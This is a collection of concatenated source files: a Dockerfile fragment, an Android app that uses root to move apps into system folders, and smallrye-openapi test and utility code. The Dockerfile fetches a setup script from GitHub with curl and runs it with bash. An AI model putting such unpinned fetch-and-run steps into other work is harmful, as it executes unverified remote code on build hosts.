&& DEBIAN_FRONTEND=noninteractive apt-get install -yqq \
python3-pip python3-dev libldap2-dev libsasl2-dev \
libmysqlclient-dev libffi-dev libssl-dev default-jre curl git \
&& pip3 install --upgrade pip \
&& pip3 install --upgrade setuptools tox
RUN curl https://raw.githubusercontent.com/fkrull/docker-multi-python/master/setup.sh -o /setup.sh \
&& bash setup.sh \
&& rm /setup.sh
| adamlamers/pypicloud |
<|start_filename|>src/main/java/de/j4velin/systemappmover/MoverActivity.java<|end_filename|>
/*
* Copyright 2012 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package de.j4velin.systemappmover;
import android.app.ProgressDialog;
import android.content.ActivityNotFoundException;
import android.content.DialogInterface;
import android.content.Intent;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.support.v7.app.AlertDialog;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.app.AppCompatDialog;
import android.view.View;
import android.widget.Button;
import android.widget.CheckBox;
import android.widget.CompoundButton;
import android.widget.TextView;
import com.stericson.RootTools.RootTools;
import java.io.File;
/**
* The main activity.
* <p/>
* All the logic starts in the AppPicker, which is started from the checkForRoot
* method if root is available
*/
public class MoverActivity extends AppCompatActivity {
public final static String SYSTEM_FOLDER_1 = "/system/priv-app/";
public final static String SYSTEM_FOLDER_2 = "/system/app/";
public final static String SYSTEM_DIR_TARGET =
Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT ? SYSTEM_FOLDER_1 : SYSTEM_FOLDER_2;
public static boolean SHOW_SYSTEM_APPS = false;
/**
* Shows an error dialog with the specified text
*
* @param text the error text
*/
void showErrorDialog(final String text) {
AlertDialog.Builder builder = new AlertDialog.Builder(this);
builder.setTitle("Error").setMessage(text)
.setPositiveButton(android.R.string.ok, new DialogInterface.OnClickListener() {
public void onClick(final DialogInterface dialog, int id) {
try {
dialog.dismiss();
} catch (Exception e) {
e.printStackTrace();
}
}
});
builder.create().show();
}
/**
* Shows another warning when enabling the 'show system apps' option
*/
void showSystemAppWarningDialog(final String text) {
AlertDialog.Builder builder = new AlertDialog.Builder(this);
builder.setTitle("Warning").setMessage(text + " Did you make a backup?")
.setPositiveButton(android.R.string.yes, new DialogInterface.OnClickListener() {
public void onClick(final DialogInterface dialog, int id) {
try {
dialog.dismiss();
} catch (Exception e) {
e.printStackTrace();
}
}
}).setNegativeButton(android.R.string.no, new DialogInterface.OnClickListener() {
public void onClick(final DialogInterface dialog, int id) {
try {
dialog.dismiss();
showErrorDialog("You should!");
} catch (Exception e) {
e.printStackTrace();
}
}
});
builder.create().show();
}
/**
* Shows the initial warning dialog
*/
void showWarningDialog() {
final AppCompatDialog d = new AppCompatDialog(this);
d.setTitle("Warning");
d.setCancelable(false);
d.setContentView(R.layout.warningdialog);
final CheckBox c = (CheckBox) d.findViewById(R.id.c);
final Button b = (Button) d.findViewById(R.id.b);
c.setOnCheckedChangeListener(new CompoundButton.OnCheckedChangeListener() {
@Override
public void onCheckedChanged(CompoundButton compoundButton, boolean checked) {
b.setText(checked ? android.R.string.ok : android.R.string.cancel);
}
});
b.setText(android.R.string.cancel);
b.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
if (c.isChecked()) {
getSharedPreferences("settings", MODE_PRIVATE).edit()
.putBoolean("warningRead", true).commit();
d.dismiss();
} else {
d.dismiss();
finish();
}
}
});
d.show();
}
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
RootTools.debugMode = false;
checkForRoot();
}
/**
* Uses the RootTools library to check for root and busybox
*/
private void checkForRoot() {
final ProgressDialog progress =
ProgressDialog.show(this, "", "Waiting for root access", true);
progress.show();
final TextView error = (TextView) findViewById(R.id.error);
final Handler h = new Handler();
new Thread(new Runnable() {
@Override
public void run() {
boolean systemlessRoot = new File("/su").exists();
if (!systemlessRoot && !RootTools.isRootAvailable()) {
if (!progress.isShowing()) return;
progress.cancel();
h.post(new Runnable() {
@Override
public void run() {
error.setText(
"Your device seems not to be rooted!\nThis app requires root access and does not work without.\n\nClick [here] to uninstall.");
// ask user to delete app on non-rooted devices
error.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
startActivity(new Intent(Intent.ACTION_DELETE,
Uri.parse("package:de.j4velin.systemappmover")));
}
});
}
});
return;
}
final boolean root = systemlessRoot || RootTools.isAccessGiven();
if (!progress.isShowing()) return;
progress.cancel();
h.post(new Runnable() {
@Override
public void run() {
if (root) {
((CheckBox) findViewById(R.id.root)).setChecked(true);
} else {
error.setText("No root access granted - click here to recheck");
error.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
checkForRoot();
}
});
return;
}
if (new File("/su/xbin/busybox").exists() ||
RootTools.isBusyboxAvailable()) {
CheckBox busyBox = (CheckBox) findViewById(R.id.busybox);
busyBox.setChecked(true);
busyBox.setText("BusyBox " + RootTools.getBusyBoxVersion());
new AppPicker(MoverActivity.this).execute();
if (!getSharedPreferences("settings", MODE_PRIVATE)
.getBoolean("warningRead", false)) {
showWarningDialog();
}
error.setText(
"Use at your own risk! I won't take responsibility for damages on your device! Make a backup first!");
final CheckBox showSystem = (CheckBox) findViewById(R.id.showsystem);
showSystem.setOnCheckedChangeListener(
new CompoundButton.OnCheckedChangeListener() {
@Override
public void onCheckedChanged(
final CompoundButton buttonView,
boolean isChecked) {
SHOW_SYSTEM_APPS = isChecked;
new AppPicker(MoverActivity.this).execute();
if (isChecked) {
String warning =
"Moving system apps is NOT recommended and will most definitely damage something on your system when doing so.";
if (Build.VERSION.SDK_INT >=
Build.VERSION_CODES.LOLLIPOP) {
warning +=
" On Android 5.0+, this feature is highly experimental and most system apps won\'t ever work again once moved!";
}
showSystemAppWarningDialog(warning);
}
}
});
} else {
error.setText("No busybox found!\nClick here to download");
error.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
try {
RootTools.offerBusyBox(MoverActivity.this);
} catch (ActivityNotFoundException anfe) {
MoverActivity.this.startActivity(
new Intent(Intent.ACTION_VIEW, Uri.parse(
"https://play.google.com/store/apps/details?id=stericson.busybox")));
}
finish();
}
});
}
}
});
}
}).start();
}
}
<|start_filename|>src/main/java/de/j4velin/systemappmover/AppPicker.java<|end_filename|>
/*
* Copyright 2014 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package de.j4velin.systemappmover;
import android.app.ProgressDialog;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.graphics.drawable.Drawable;
import android.os.AsyncTask;
import android.widget.ListView;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.Iterator;
import java.util.List;
/**
* Class to list all installed app.
* <p/>
* The actual moving happens in the AppClickListener class when an item is clicked.
*/
public class AppPicker extends AsyncTask<Void, Void, Void> {
List<Drawable> icons;
List<ApplicationInfo> apps;
PackageManager pm;
private ProgressDialog progress;
final MoverActivity activity;
public AppPicker(final MoverActivity a) {
activity = a;
}
@Override
protected void onPreExecute() {
pm = activity.getPackageManager();
progress = ProgressDialog.show(activity, "", "Loading apps", true);
}
@Override
protected void onPostExecute(Void a) {
try {
progress.cancel();
} catch (IllegalArgumentException e) {
if (BuildConfig.DEBUG) Logger.log(e);
}
if (apps == null || apps.isEmpty()) {
activity.showErrorDialog("Error loadings apps!");
} else {
ListView liste = (ListView) activity.findViewById(R.id.apps);
liste.setAdapter(new EfficientAdapter(activity, this));
liste.setOnItemClickListener(new AppClickListener(this));
}
}
@Override
protected Void doInBackground(Void... params) {
// load all apps and their icons, sort them alphabetical
apps = pm.getInstalledApplications(0);
if (!MoverActivity.SHOW_SYSTEM_APPS) {
Iterator<ApplicationInfo> it = apps.iterator();
ApplicationInfo app;
while (it.hasNext()) {
app = it.next();
if ((app.flags & ApplicationInfo.FLAG_SYSTEM) == 1) it.remove();
}
}
try {
Collections.sort(apps, new Comparator<ApplicationInfo>() {
public int compare(final ApplicationInfo app1, final ApplicationInfo app2) {
try {
return app1.loadLabel(pm).toString().toLowerCase()
.compareTo(app2.loadLabel(pm).toString().toLowerCase());
} catch (Exception e) {
e.printStackTrace();
return 0;
}
}
});
} catch (IllegalArgumentException iae) {
}
icons = new ArrayList<Drawable>(apps.size());
try {
for (int i = 0; i < apps.size(); i++) {
icons.add(apps.get(i).loadIcon(pm));
}
} catch (OutOfMemoryError oom) {
}
return null;
}
} | emaiannone/SystemAppMover |
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/TestResource3.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.List;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.enums.SchemaType;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
@Path(value = "/generic")
@Consumes(value = MediaType.APPLICATION_JSON)
@Produces(value = MediaType.APPLICATION_JSON)
public class TestResource3 extends BaseResource2<Apple, String> {
@POST
@Path(value = "save")
public Apple update(Apple filter) {
return null;
}
@POST
@Path(value = "retrieve")
public List<Apple> update(
@QueryParam("ids") @Schema(type = SchemaType.ARRAY, implementation = Integer.class) String values) {
return null;
}
}
<|start_filename|>ui/open-api-ui/src/main/webapp/style.css<|end_filename|>
html{
box-sizing: border-box;
overflow: -moz-scrollbars-vertical;
overflow-y: scroll;
}
*,
*:before,
*:after
{
box-sizing: inherit;
}
body{
margin:0;
background: #fafafa;
}
.swagger-ui .topbar {
background-color: #343a40;
}
#footer {
font-family:sans-serif;
color:#3b4151;
font-size:70%;
text-align: center;
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/runtime/io/OpenApiParserAndSerializerTest.java<|end_filename|>
package io.smallrye.openapi.runtime.io;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.StringReader;
import java.net.URL;
import java.text.ParseException;
import org.apache.commons.io.IOUtils;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.json.JSONException;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.Test;
import org.skyscreamer.jsonassert.JSONAssert;
/**
* @author <EMAIL>
*/
class OpenApiParserAndSerializerTest {
/**
* Loads a resource as a string (reads the content at the URL).
*
* @param testResource
* @throws IOException
*/
private static String loadResource(URL testResource) throws IOException {
return IOUtils.toString(testResource, "UTF-8");
}
/**
* Compares two JSON strings.
*
* @param expected
* @param actual
* @throws JSONException
*/
private static void assertJsonEquals(String expected, String actual) throws JSONException {
JSONAssert.assertEquals(expected, actual, true);
}
/**
* @param original
* @param roundTrip
*/
private static void assertYamlEquals(String original, String roundTrip) {
Assertions.assertEquals(normalizeYaml(original), normalizeYaml(roundTrip));
}
/**
* Normalizes the YAML by removing any comments.
*
* @param yaml
*/
private static String normalizeYaml(String yaml) {
try {
StringBuilder builder = new StringBuilder();
BufferedReader reader = new BufferedReader(new StringReader(yaml));
for (String line = reader.readLine(); line != null; line = reader.readLine()) {
if (line.startsWith("--")) {
continue;
}
builder.append(line);
builder.append("\n");
}
return builder.toString();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
/**
* Performs a full round-trip parse+serialize test on a single resource.
*
* @param resource
* @param format
* @throws IOException
* @throws ParseException
* @throws JSONException
*/
private static void doTest(String resource, Format format) throws IOException, ParseException, JSONException {
URL testResource = OpenApiParserAndSerializerTest.class.getResource(resource);
String original = loadResource(testResource);
OpenAPI impl = OpenApiParser.parse(testResource);
String roundTrip = OpenApiSerializer.serialize(impl, format);
try {
if (format == Format.JSON) {
assertJsonEquals(original, roundTrip);
} else {
assertYamlEquals(original, roundTrip);
}
} catch (AssertionError e) {
System.out.println("================");
System.out.println(roundTrip);
System.out.println("================");
throw e;
}
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testParseSimplest() throws IOException, ParseException, JSONException {
doTest("simplest.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testParseSimplestYaml() throws IOException, ParseException, JSONException {
doTest("simplest.yaml", Format.YAML);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testParseInfo() throws IOException, ParseException, JSONException {
doTest("info.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testParseInfoYaml() throws IOException, ParseException, JSONException {
doTest("info.yaml", Format.YAML);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testExternalDocs() throws IOException, ParseException, JSONException {
doTest("externalDocs.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testExtensions() throws IOException, ParseException, JSONException {
doTest("extensions.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSecurity() throws IOException, ParseException, JSONException {
doTest("security.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testServers() throws IOException, ParseException, JSONException {
doTest("servers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testServersYaml() throws IOException, ParseException, JSONException {
doTest("servers.yaml", Format.YAML);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testTags() throws IOException, ParseException, JSONException {
doTest("tags.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Callbacks() throws IOException, ParseException, JSONException {
doTest("components-callbacks.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Empty() throws IOException, ParseException, JSONException {
doTest("components-empty.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Examples() throws IOException, ParseException, JSONException {
doTest("components-examples.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Headers() throws IOException, ParseException, JSONException {
doTest("components-headers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Links() throws IOException, ParseException, JSONException {
doTest("components-links.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Parameters() throws IOException, ParseException, JSONException {
doTest("components-parameters.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_RequestBodies() throws IOException, ParseException, JSONException {
doTest("components-requestBodies.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Responses() throws IOException, ParseException, JSONException {
doTest("components-responses.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Schemas() throws IOException, ParseException, JSONException {
doTest("components-schemas.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_SecuritySchemes() throws IOException, ParseException, JSONException {
doTest("components-securitySchemes.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_AllOperations() throws IOException, ParseException, JSONException {
doTest("paths-all-operations.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Empty() throws IOException, ParseException, JSONException {
doTest("paths-empty.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetCallbacks() throws IOException, ParseException, JSONException {
doTest("paths-get-callbacks.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetParameters() throws IOException, ParseException, JSONException {
doTest("paths-get-parameters.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetRequestBodyContent() throws IOException, ParseException, JSONException {
doTest("paths-get-requestBody-content.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetRequestBodyExample() throws IOException, ParseException, JSONException {
doTest("paths-get-requestBody-example.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetRequestBody() throws IOException, ParseException, JSONException {
doTest("paths-get-requestBody.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetResponseContent() throws IOException, ParseException, JSONException {
doTest("paths-get-response-content.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetResponseHeaders() throws IOException, ParseException, JSONException {
doTest("paths-get-response-headers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetResponseLinks() throws IOException, ParseException, JSONException {
doTest("paths-get-response-links.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetResponses() throws IOException, ParseException, JSONException {
doTest("paths-get-responses.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetSecurity() throws IOException, ParseException, JSONException {
doTest("paths-get-security.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetServers() throws IOException, ParseException, JSONException {
doTest("paths-get-servers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Get() throws IOException, ParseException, JSONException {
doTest("paths-get.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Parameters() throws IOException, ParseException, JSONException {
doTest("paths-parameters.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Ref() throws IOException, ParseException, JSONException {
doTest("paths-ref.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Servers() throws IOException, ParseException, JSONException {
doTest("paths-servers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Extensions() throws IOException, ParseException, JSONException {
doTest("paths-with-extensions.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_Discriminator() throws IOException, ParseException, JSONException {
doTest("schemas-discriminator.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_AdditionalProperties() throws IOException, ParseException, JSONException {
doTest("schemas-with-additionalProperties.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_AllOf() throws IOException, ParseException, JSONException {
doTest("schemas-with-allOf.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_Composition() throws IOException, ParseException, JSONException {
doTest("schemas-with-composition.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_Example() throws IOException, ParseException, JSONException {
doTest("schemas-with-example.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_ExternalDocs() throws IOException, ParseException, JSONException {
doTest("schemas-with-externalDocs.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_MetaData() throws IOException, ParseException, JSONException {
doTest("schemas-with-metaData.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_XML() throws IOException, ParseException, JSONException {
doTest("schemas-with-xml.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testEverything() throws IOException, ParseException, JSONException {
doTest("_everything.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testEverythingYaml() throws IOException, ParseException, JSONException {
doTest("_everything.yaml", Format.YAML);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/entities/JaxbGreeting.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.entities;
import javax.xml.bind.annotation.XmlRootElement;
@XmlRootElement
public class JaxbGreeting {
private final String message;
public JaxbGreeting(String message) {
this.message = message;
}
public String getMessage() {
return message;
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/ExpectationTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import static org.jboss.jandex.DotName.createSimple;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.jboss.jandex.ClassType;
import org.jboss.jandex.DotName;
import org.jboss.jandex.Type;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.provider.CsvSource;
import test.io.smallrye.openapi.runtime.scanner.entities.Bar;
import test.io.smallrye.openapi.runtime.scanner.entities.BuzzLinkedList;
import test.io.smallrye.openapi.runtime.scanner.entities.EnumContainer;
import test.io.smallrye.openapi.runtime.scanner.entities.EnumRequiredContainer;
import test.io.smallrye.openapi.runtime.scanner.entities.GenericTypeTestContainer;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class ExpectationTests extends JaxRsDataObjectScannerTestBase {
/**
* Unresolvable type parameter.
*/
@Test
void testUnresolvable() throws IOException, JSONException {
DotName bar = createSimple(Bar.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, ClassType.create(bar, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(bar.local(), result);
assertJsonEquals(bar.local(), "unresolvable.expected.json", result);
}
/**
* Unresolvable type parameter.
*/
@Test
void testCycle() throws IOException, JSONException {
DotName buzz = createSimple(BuzzLinkedList.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, ClassType.create(buzz, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(buzz.local(), result);
assertJsonEquals(buzz.local(), "cycle.expected.json", result);
}
@Test
void testBareEnum() throws IOException, JSONException {
DotName baz = createSimple(EnumContainer.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, ClassType.create(baz, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(baz.local(), result);
assertJsonEquals(baz.local(), "enum.expected.json", result);
}
@Test
void testRequiredEnum() throws IOException, JSONException {
DotName baz = createSimple(EnumRequiredContainer.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, ClassType.create(baz, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(baz.local(), result);
assertJsonEquals(baz.local(), "enumRequired.expected.json", result);
}
@ParameterizedTest
@CsvSource({
"nesting, generic.nested.expected.json",
"complexNesting, generic.complexNesting.expected.json",
"complexInheritance, generic.complexInheritance.expected.json",
"genericWithBounds, generic.withBounds.expected.json",
"genericContainer, generic.fields.expected.json",
"overriddenNames, generic.fields.overriddenNames.expected.json"
})
void testGenericTypeFields(String fieldName, String expectedResource) throws IOException, JSONException {
String name = GenericTypeTestContainer.class.getName();
Type pType = getFieldFromKlazz(name, fieldName).type();
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, pType);
Schema result = scanner.process();
printToConsole(name, result);
assertJsonEquals(name, expectedResource, result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/RequestBodyScanTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import java.util.HashMap;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
class RequestBodyScanTests extends IndexScannerTestBase {
private static void test(String expectedResource, Class<?>... classes) throws IOException, JSONException {
Index index = indexOf(classes);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), index);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals(expectedResource, result);
}
@Test
void testJavaxResteasyMultipartInput() throws IOException, JSONException {
test("params.resteasy-multipart-mixed.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartInputTestResource.class);
}
@Test
void testJakartaResteasyMultipartInput() throws IOException, JSONException {
test("params.resteasy-multipart-mixed.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartInputTestResource.class);
}
@Test
void testJavaxResteasyMultipartInputList() throws IOException, JSONException {
test("params.resteasy-multipart-mixed-array.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartMixedListTestResource.class,
test.io.smallrye.openapi.runtime.scanner.RequestBodyWidget.class);
}
@Test
void testJakartaResteasyMultipartInputList() throws IOException, JSONException {
test("params.resteasy-multipart-mixed-array.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartMixedListTestResource.class,
test.io.smallrye.openapi.runtime.scanner.RequestBodyWidget.class);
}
@Test
void testJavaxResteasyMultipartFormDataInput() throws IOException, JSONException {
test("params.resteasy-multipart-form-data-input.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartFormDataInputTestResource.class);
}
@Test
void testJakartaResteasyMultipartFormDataInput() throws IOException, JSONException {
test("params.resteasy-multipart-form-data-input.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartFormDataInputTestResource.class);
}
@Test
void testJavaxResteasyMultipartFormDataMap() throws IOException, JSONException {
test("params.resteasy-multipart-form-data-map.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartFormDataMapTestResource.class,
test.io.smallrye.openapi.runtime.scanner.RequestBodyWidget.class);
}
@Test
void testJakartaResteasyMultipartFormDataMap() throws IOException, JSONException {
test("params.resteasy-multipart-form-data-map.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartFormDataMapTestResource.class,
test.io.smallrye.openapi.runtime.scanner.RequestBodyWidget.class);
}
@Test
void testJavaxResteasyMultipartRelatedInput() throws IOException, JSONException {
test("params.resteasy-multipart-related-input.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartRelatedInputTestResource.class);
}
@Test
void testJakartaResteasyMultipartRelatedInput() throws IOException, JSONException {
test("params.resteasy-multipart-related-input.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartRelatedInputTestResource.class);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/AbstractPet.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
/* Test models and resources below. */
public abstract class AbstractPet {
@Schema(name = "pet_type", required = true)
private String type;
public String getType() {
return type;
}
public void setType(String type) {
this.type = type;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/NonJavaBeanAccessorProperty.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class NonJavaBeanAccessorProperty {
String name;
@Schema(title = "Name of the property")
String name() {
return name;
}
// Should be skipped
String anotherValue() {
return null;
}
// Should be skipped
String get() {
return name;
}
// Should be skipped
String isNotAnAccessor() {
return null;
}
void name(String name) {
this.name = name;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/util/FilterUtil.java<|end_filename|>
package io.smallrye.openapi.api.util;
import java.util.ArrayList;
import java.util.Collection;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Map;
import java.util.function.BiConsumer;
import java.util.function.Consumer;
import java.util.function.UnaryOperator;
import org.eclipse.microprofile.openapi.OASFilter;
import org.eclipse.microprofile.openapi.models.Components;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.eclipse.microprofile.openapi.models.Operation;
import org.eclipse.microprofile.openapi.models.PathItem;
import org.eclipse.microprofile.openapi.models.callbacks.Callback;
import org.eclipse.microprofile.openapi.models.headers.Header;
import org.eclipse.microprofile.openapi.models.links.Link;
import org.eclipse.microprofile.openapi.models.media.Content;
import org.eclipse.microprofile.openapi.models.media.Encoding;
import org.eclipse.microprofile.openapi.models.media.MediaType;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.eclipse.microprofile.openapi.models.parameters.Parameter;
import org.eclipse.microprofile.openapi.models.parameters.RequestBody;
import org.eclipse.microprofile.openapi.models.responses.APIResponse;
import org.eclipse.microprofile.openapi.models.responses.APIResponses;
/**
* @author <EMAIL>
*
*/
public class FilterUtil {
private FilterUtil() {
}
/**
* Apply the given filter to the given model.
*
* @param filter
* OASFilter
* @param model
* OpenAPI model
* @return Filtered OpenAPI model
